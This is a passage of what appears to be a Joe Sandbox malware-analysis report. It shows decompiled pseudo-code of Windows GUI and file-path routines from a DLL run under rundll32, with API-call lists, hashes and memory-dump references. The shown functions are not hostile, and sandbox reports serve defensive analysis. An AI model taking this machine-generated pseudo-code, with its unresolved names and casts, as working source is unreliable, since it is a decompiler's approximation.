								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10009B1B();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1001175A(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10011775(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1001034E(_t96, __eflags, _t100);
					_t58 = E1000E5E5(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E10009F04(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E10011632(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000E17B(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E100117F5(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E10011775(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E10009C88(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E1003EF21(_t63);
				}
			}
















                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0fb
                                                                                                        0x1000a100
                                                                                                        0x1000a102
                                                                                                        0x1000a108
                                                                                                        0x1000a10e
                                                                                                        0x1000a111
                                                                                                        0x1000a116
                                                                                                        0x1000a119
                                                                                                        0x1000a11b
                                                                                                        0x1000a11e
                                                                                                        0x1000a125
                                                                                                        0x1000a136
                                                                                                        0x1000a13c
                                                                                                        0x1000a13c
                                                                                                        0x1000a142
                                                                                                        0x1000a147
                                                                                                        0x1000a14d
                                                                                                        0x1000a14d
                                                                                                        0x1000a153
                                                                                                        0x1000a15d
                                                                                                        0x1000a164
                                                                                                        0x1000a167
                                                                                                        0x1000a16c
                                                                                                        0x1000a16f
                                                                                                        0x1000a172
                                                                                                        0x1000a175
                                                                                                        0x1000a178
                                                                                                        0x1000a180
                                                                                                        0x1000a183
                                                                                                        0x1000a18e
                                                                                                        0x1000a190
                                                                                                        0x1000a197
                                                                                                        0x1000a19d
                                                                                                        0x1000a1a9
                                                                                                        0x1000a1ab
                                                                                                        0x1000a1ad
                                                                                                        0x1000a1b0
                                                                                                        0x1000a1b4
                                                                                                        0x1000a1bc
                                                                                                        0x1000a1be
                                                                                                        0x1000a1c0
                                                                                                        0x1000a1c7
                                                                                                        0x1000a1c9
                                                                                                        0x1000a1cd
                                                                                                        0x1000a1cf
                                                                                                        0x1000a1d4
                                                                                                        0x1000a1d4
                                                                                                        0x1000a1c9
                                                                                                        0x1000a1be
                                                                                                        0x1000a1b0
                                                                                                        0x1000a190
                                                                                                        0x1000a183
                                                                                                        0x1000a1db
                                                                                                        0x1000a1e0
                                                                                                        0x1000a1e8
                                                                                                        0x1000a1ed
                                                                                                        0x1000a1ee
                                                                                                        0x1000a1ef
                                                                                                        0x1000a1f4
                                                                                                        0x1000a1f9
                                                                                                        0x1000a1fb
                                                                                                        0x1000a1fd
                                                                                                        0x1000a1ff
                                                                                                        0x1000a203
                                                                                                        0x1000a207
                                                                                                        0x1000a20a
                                                                                                        0x1000a20f
                                                                                                        0x1000a213
                                                                                                        0x1000a217
                                                                                                        0x1000a217
                                                                                                        0x1000a21b
                                                                                                        0x1000a220
                                                                                                        0x1000a220
                                                                                                        0x1000a220
                                                                                                        0x1000a222
                                                                                                        0x1000a225
                                                                                                        0x1000a233
                                                                                                        0x1000a233
                                                                                                        0x1000a225
                                                                                                        0x1000a238
                                                                                                        0x1000a25b
                                                                                                        0x1000a25e
                                                                                                        0x1000a264
                                                                                                        0x1000a264
                                                                                                        0x1000a269
                                                                                                        0x1000a26c
                                                                                                        0x1000a273
                                                                                                        0x1000a273
                                                                                                        0x1000a279
                                                                                                        0x1000a27c
                                                                                                        0x1000a284
                                                                                                        0x1000a287
                                                                                                        0x1000a28c
                                                                                                        0x1000a28c
                                                                                                        0x1000a287
                                                                                                        0x1000a296
                                                                                                        0x1000a29b
                                                                                                        0x1000a2a0
                                                                                                        0x1000a2a3
                                                                                                        0x1000a2a8
                                                                                                        0x1000a2a8
                                                                                                        0x1000a2ae
                                                                                                        0x00000000
                                                                                                        0x1000a155
                                                                                                        0x1000a155
                                                                                                        0x1000a2b1
                                                                                                        0x1000a2b6
                                                                                                        0x1000a2b6

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1000A0FB
                                                                                                        • FindResourceA.KERNEL32(?,?,00000005), ref: 1000A12E
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000A136
                                                                                                        • LockResource.KERNEL32(?,00000024,10005DF1), ref: 1000A147
                                                                                                        • GetDesktopWindow.USER32 ref: 1000A17A
                                                                                                        • IsWindowEnabled.USER32(?), ref: 1000A188
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 1000A197
                                                                                                          • Part of subcall function 1001175A: IsWindowEnabled.USER32(?), ref: 10011763
                                                                                                          • Part of subcall function 10011775: EnableWindow.USER32(?,?), ref: 10011782
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000A273
                                                                                                        • GetActiveWindow.USER32 ref: 1000A27E
                                                                                                        • SetActiveWindow.USER32(?,?,00000024,10005DF1), ref: 1000A28C
                                                                                                        • FreeResource.KERNEL32(?,?,00000024,10005DF1), ref: 1000A2A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1509511306-0
                                                                                                        • Opcode ID: b724f489e0530e0053a87cafde1a89b908525f936da5bccd636eb58396c7ef11
                                                                                                        • Instruction ID: 1ed850bfacade8e03f614ee38965a319621bb4febb32a9e65c6a07d79f59a685
                                                                                                        • Opcode Fuzzy Hash: b724f489e0530e0053a87cafde1a89b908525f936da5bccd636eb58396c7ef11
                                                                                                        • Instruction Fuzzy Hash: 7A519E34A00705DFEB11DFA4C8996AEBBF1FF49781F11022DE902B62A5DB719E81CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002C51C, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 163COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E1002C51C(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed int _v72;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t62;
				signed int _t63;
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int _t79;
				short _t80;
				short _t87;
				short _t92;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr* _t118;

				_t115 = _a4;
				_t118 = __ecx;
				if(E1000C592(__ecx, __eflags, _t115) == 0) {
					_t116 =  *((intOrPtr*)(_t115 + 4));
					_push(__ebx);
					_t100 = __ecx;
					_t60 = E1000F8F1(__ecx);
					__eflags =  *(__ecx + 0x80) & 0x00000020;
					_v20 = _t60;
					if(( *(__ecx + 0x80) & 0x00000020) != 0) {
						L5:
						__eflags = _t116 - 0x200;
						if(_t116 < 0x200) {
							L7:
							__eflags = _t116 - 0xa0 - 9;
							if(__eflags > 0) {
								L30:
								_t62 = E1000F039(_t118);
								__eflags = _t62;
								if(_t62 == 0) {
									L32:
									__eflags = _v20;
									if(_v20 == 0) {
										L35:
										_t63 = IsWindow( *(_t118 + 0x20));
										__eflags = _t63;
										if(_t63 == 0) {
											L37:
											__eflags = 0;
											return 0;
										}
										return E1000CB93(_a4);
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t117 = _v20;
										_t67 =  *((intOrPtr*)( *_v20 + 0x100))(_a4);
										__eflags = _t67;
										if(_t67 != 0) {
											goto L1;
										}
										_t70 = E1000EFFA(_t117);
										__eflags = _t70;
										_v20 = _t70;
										if(_t70 != 0) {
											continue;
										}
										goto L35;
									}
									goto L1;
								}
								__eflags =  *(_t62 + 0x68);
								if( *(_t62 + 0x68) != 0) {
									goto L37;
								}
								goto L32;
							}
							L8:
							_v16 = E1000AB4C(0x201, _t100, _t116, _t118, __eflags);
							_t72 = _a4;
							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
							_v28.x =  *(_t72 + 0x14);
							ScreenToClient( *(_t118 + 0x20),  &_v28);
							E1003E9B0(_t116,  &_v76, 0, 0x30);
							_v76 = 0x28;
							_t79 =  *((intOrPtr*)( *_t118 + 0x6c))(_v28.x, _v28.y,  &_v76);
							__eflags = _v40 - 0xffffffff;
							_v8 = _t79;
							if(__eflags != 0) {
								_push(_v40);
								E10039F30(0x201, _t116, _t118, __eflags);
							}
							__eflags = _t116 - 0x201;
							if(_t116 != 0x201) {
								L13:
								_v12 = _v12 & 0x00000000;
								__eflags = _t116 - 0x201;
								if(_t116 != 0x201) {
									_t92 = GetKeyState(1);
									__eflags = _t92;
									if(_t92 < 0) {
										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
									}
								}
								L16:
								__eflags = _v8;
								if(_v8 < 0) {
									L26:
									_t80 = GetKeyState(1);
									__eflags = _t80;
									if(_t80 >= 0) {
										L28:
										 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
										KillTimer( *(_t118 + 0x20), 0xe001);
										L29:
										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
										goto L30;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v12;
								if(_v12 != 0) {
									goto L26;
								}
								__eflags = _t116 - 0x202;
								if(_t116 != 0x202) {
									__eflags =  *(_t118 + 0x7c) & 0x00000008;
									if(( *(_t118 + 0x7c) & 0x00000008) != 0) {
										L25:
										 *((intOrPtr*)( *_t118 + 0x164))(_v8);
										goto L29;
									}
									_t87 = GetKeyState(1);
									__eflags = _t87;
									if(_t87 < 0) {
										goto L25;
									}
									_t111 = _v16;
									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
										goto L29;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E1002BBBB(_t118);
									goto L29;
								}
								 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
								_push(0xc8);
								_push(0xe001);
								goto L20;
							}
							__eflags = _v72 & 0x80000000;
							if((_v72 & 0x80000000) == 0) {
								goto L13;
							}
							_v12 = 1;
							goto L16;
						}
						__eflags = _t116 - 0x209;
						if(__eflags <= 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t116 - 0x201;
					if(_t116 == 0x201) {
						goto L5;
					}
					__eflags = _t116 - 0x202;
					if(_t116 != 0x202) {
						goto L30;
					}
					goto L5;
				}
				L1:
				return 1;
			}




























                                                                                                        0x1002c524
                                                                                                        0x1002c528
                                                                                                        0x1002c531
                                                                                                        0x1002c53b
                                                                                                        0x1002c53e
                                                                                                        0x1002c53f
                                                                                                        0x1002c541
                                                                                                        0x1002c546
                                                                                                        0x1002c54d
                                                                                                        0x1002c555
                                                                                                        0x1002c567
                                                                                                        0x1002c567
                                                                                                        0x1002c56d
                                                                                                        0x1002c577
                                                                                                        0x1002c57d
                                                                                                        0x1002c580
                                                                                                        0x1002c6ba
                                                                                                        0x1002c6bc
                                                                                                        0x1002c6c1
                                                                                                        0x1002c6c4
                                                                                                        0x1002c6cc
                                                                                                        0x1002c6cc
                                                                                                        0x1002c6d0
                                                                                                        0x1002c6f8
                                                                                                        0x1002c6fb
                                                                                                        0x1002c701
                                                                                                        0x1002c703
                                                                                                        0x1002c711
                                                                                                        0x1002c711
                                                                                                        0x00000000
                                                                                                        0x1002c711
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c6d2
                                                                                                        0x1002c6d2
                                                                                                        0x1002c6d2
                                                                                                        0x1002c6dc
                                                                                                        0x1002c6e2
                                                                                                        0x1002c6e4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c6ec
                                                                                                        0x1002c6f1
                                                                                                        0x1002c6f3
                                                                                                        0x1002c6f6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c6f6
                                                                                                        0x00000000
                                                                                                        0x1002c6d2
                                                                                                        0x1002c6c6
                                                                                                        0x1002c6ca
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c6ca
                                                                                                        0x1002c586
                                                                                                        0x1002c58b
                                                                                                        0x1002c58e
                                                                                                        0x1002c597
                                                                                                        0x1002c5a1
                                                                                                        0x1002c5a4
                                                                                                        0x1002c5b2
                                                                                                        0x1002c5c8
                                                                                                        0x1002c5cf
                                                                                                        0x1002c5d2
                                                                                                        0x1002c5d6
                                                                                                        0x1002c5d9
                                                                                                        0x1002c5db
                                                                                                        0x1002c5de
                                                                                                        0x1002c5e3
                                                                                                        0x1002c5e4
                                                                                                        0x1002c5e6
                                                                                                        0x1002c5fa
                                                                                                        0x1002c5fa
                                                                                                        0x1002c5fe
                                                                                                        0x1002c600
                                                                                                        0x1002c604
                                                                                                        0x1002c60a
                                                                                                        0x1002c60d
                                                                                                        0x1002c615
                                                                                                        0x1002c615
                                                                                                        0x1002c60d
                                                                                                        0x1002c618
                                                                                                        0x1002c618
                                                                                                        0x1002c61c
                                                                                                        0x1002c684
                                                                                                        0x1002c686
                                                                                                        0x1002c68c
                                                                                                        0x1002c68f
                                                                                                        0x1002c697
                                                                                                        0x1002c69d
                                                                                                        0x1002c6ab
                                                                                                        0x1002c6b1
                                                                                                        0x1002c6b7
                                                                                                        0x00000000
                                                                                                        0x1002c6b7
                                                                                                        0x1002c691
                                                                                                        0x1002c695
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c695
                                                                                                        0x1002c61e
                                                                                                        0x1002c622
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c624
                                                                                                        0x1002c62a
                                                                                                        0x1002c64b
                                                                                                        0x1002c64f
                                                                                                        0x1002c675
                                                                                                        0x1002c67c
                                                                                                        0x00000000
                                                                                                        0x1002c67c
                                                                                                        0x1002c653
                                                                                                        0x1002c659
                                                                                                        0x1002c65c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c661
                                                                                                        0x1002c664
                                                                                                        0x1002c667
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c669
                                                                                                        0x1002c66e
                                                                                                        0x1002c642
                                                                                                        0x1002c644
                                                                                                        0x00000000
                                                                                                        0x1002c644
                                                                                                        0x1002c632
                                                                                                        0x1002c638
                                                                                                        0x1002c63d
                                                                                                        0x00000000
                                                                                                        0x1002c63d
                                                                                                        0x1002c5e8
                                                                                                        0x1002c5ef
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c5f1
                                                                                                        0x00000000
                                                                                                        0x1002c5f1
                                                                                                        0x1002c56f
                                                                                                        0x1002c575
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c575
                                                                                                        0x1002c557
                                                                                                        0x1002c559
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c55b
                                                                                                        0x1002c561
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002c561
                                                                                                        0x1002c533
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientScreenWindow_memset
                                                                                                        • String ID: (
                                                                                                        • API String ID: 1268500159-3887548279
                                                                                                        • Opcode ID: 5189579516be3e26e94f9f8a042d911c248b09b7d8da56a2f08f3b3d2b61556d
                                                                                                        • Instruction ID: 3b976960c39fad2a1f5a8c11b28448dcfff239e20118b40ed98fb4e501ff2bb9
                                                                                                        • Opcode Fuzzy Hash: 5189579516be3e26e94f9f8a042d911c248b09b7d8da56a2f08f3b3d2b61556d
                                                                                                        • Instruction Fuzzy Hash: 6151C134A00609AFDB10DFE4D888FADBBF1EF04384FA14169E906A7291D771AE81CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002F3E9, Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1002F3E9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x10072650; // 0xb5e27fef
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1003EE82(0x10055bd1, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E1000836F(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E10001DB0(_t98 - 0x10, E10007F7E());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E1002F247(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E10001280( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E10025E38(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E1002F3BE(_t92,  *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E10001280( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E100083B8(_t74, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E1002F3BE(_t92,  *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E10039F21(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}






















                                                                                                        0x1002f3e9
                                                                                                        0x1002f3e9
                                                                                                        0x1002f3e9
                                                                                                        0x1002f3f0
                                                                                                        0x1002f3f4
                                                                                                        0x1002f3fb
                                                                                                        0x1002f401
                                                                                                        0x1002f408
                                                                                                        0x1002f413
                                                                                                        0x1002f419
                                                                                                        0x1002f41f
                                                                                                        0x1002f424
                                                                                                        0x1002f429
                                                                                                        0x1002f42b
                                                                                                        0x1002f42d
                                                                                                        0x1002f42d
                                                                                                        0x1002f42d
                                                                                                        0x1002f43b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002f449
                                                                                                        0x1002f451
                                                                                                        0x1002f470
                                                                                                        0x1002f472
                                                                                                        0x00000000
                                                                                                        0x1002f474
                                                                                                        0x1002f47d
                                                                                                        0x1002f482
                                                                                                        0x1002f48b
                                                                                                        0x1002f493
                                                                                                        0x1002f499
                                                                                                        0x1002f49b
                                                                                                        0x1002f52d
                                                                                                        0x1002f533
                                                                                                        0x1002f53a
                                                                                                        0x1002f53a
                                                                                                        0x1002f4a1
                                                                                                        0x1002f4b1
                                                                                                        0x1002f4b7
                                                                                                        0x1002f4b9
                                                                                                        0x1002f4d1
                                                                                                        0x1002f4d5
                                                                                                        0x1002f4d8
                                                                                                        0x1002f4d8
                                                                                                        0x1002f4de
                                                                                                        0x1002f4e2
                                                                                                        0x00000000
                                                                                                        0x1002f4e4
                                                                                                        0x1002f4e9
                                                                                                        0x1002f4ef
                                                                                                        0x1002f4f2
                                                                                                        0x00000000
                                                                                                        0x1002f4f4
                                                                                                        0x1002f4f5
                                                                                                        0x1002f4fb
                                                                                                        0x1002f4ff
                                                                                                        0x00000000
                                                                                                        0x1002f501
                                                                                                        0x1002f501
                                                                                                        0x1002f504
                                                                                                        0x00000000
                                                                                                        0x1002f506
                                                                                                        0x1002f50a
                                                                                                        0x1002f513
                                                                                                        0x1002f517
                                                                                                        0x1002f519
                                                                                                        0x00000000
                                                                                                        0x1002f51b
                                                                                                        0x1002f51f
                                                                                                        0x1002f51f
                                                                                                        0x1002f525
                                                                                                        0x00000000
                                                                                                        0x1002f52a
                                                                                                        0x1002f519
                                                                                                        0x1002f504
                                                                                                        0x1002f4ff
                                                                                                        0x1002f4f2
                                                                                                        0x1002f4bb
                                                                                                        0x1002f4bb
                                                                                                        0x1002f4bf
                                                                                                        0x1002f4c4
                                                                                                        0x1002f4ca
                                                                                                        0x00000000
                                                                                                        0x1002f4ca
                                                                                                        0x1002f4b9
                                                                                                        0x1002f49b
                                                                                                        0x1002f453
                                                                                                        0x1002f458
                                                                                                        0x1002f460
                                                                                                        0x1002f464
                                                                                                        0x1002f469
                                                                                                        0x1002f469
                                                                                                        0x1002f469
                                                                                                        0x1002f53e
                                                                                                        0x1002f546
                                                                                                        0x1002f547
                                                                                                        0x1002f548
                                                                                                        0x1002f55d

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1002F408
                                                                                                        • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 1002F449
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • PathIsUNCA.SHLWAPI(?,?,?,00000000), ref: 1002F493
                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 1002F4B1
                                                                                                        • CharUpperA.USER32(?), ref: 1002F4D8
                                                                                                        • FindFirstFileA.KERNEL32(?,00000000), ref: 1002F4E9
                                                                                                        • FindClose.KERNEL32(00000000), ref: 1002F4F5
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1002F50A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4099955704-0
                                                                                                        • Opcode ID: 9cda7c8987709977b133612f26a677290ede3d50c480b065a90195aa96a01617
                                                                                                        • Instruction ID: 67faae7cd98050ab63f6579e4938a12d3730f5cbb5b6b41027c11cef4078a9fd
                                                                                                        • Opcode Fuzzy Hash: 9cda7c8987709977b133612f26a677290ede3d50c480b065a90195aa96a01617
                                                                                                        • Instruction Fuzzy Hash: B041927190015AABEB11EBB4DC85AFF77BCEF04394F50053AF915E2191EB74AA04CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10014B67, Relevance: 10.6, APIs: 7, Instructions: 68windowkeyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 67%
                                                                                                        			E10014B67(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				signed short _t23;
				signed short _t24;
				long _t25;
				void* _t30;
				int _t33;
				struct HWND__* _t37;

				_push(__ecx);
				_t30 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				_t23 = 0;
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t24 = _t23;
				_t37 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t37 != 0) {
					_t33 = _a4 << 0x00000010 | _t24 & 0x0000ffff;
					do {
						_t25 = SendMessageA(_t37, 0x20a, _t33, _a8);
						_t37 = GetParent(_t37);
					} while (_t25 == 0 && _t37 != 0 && _t37 != _v8);
				} else {
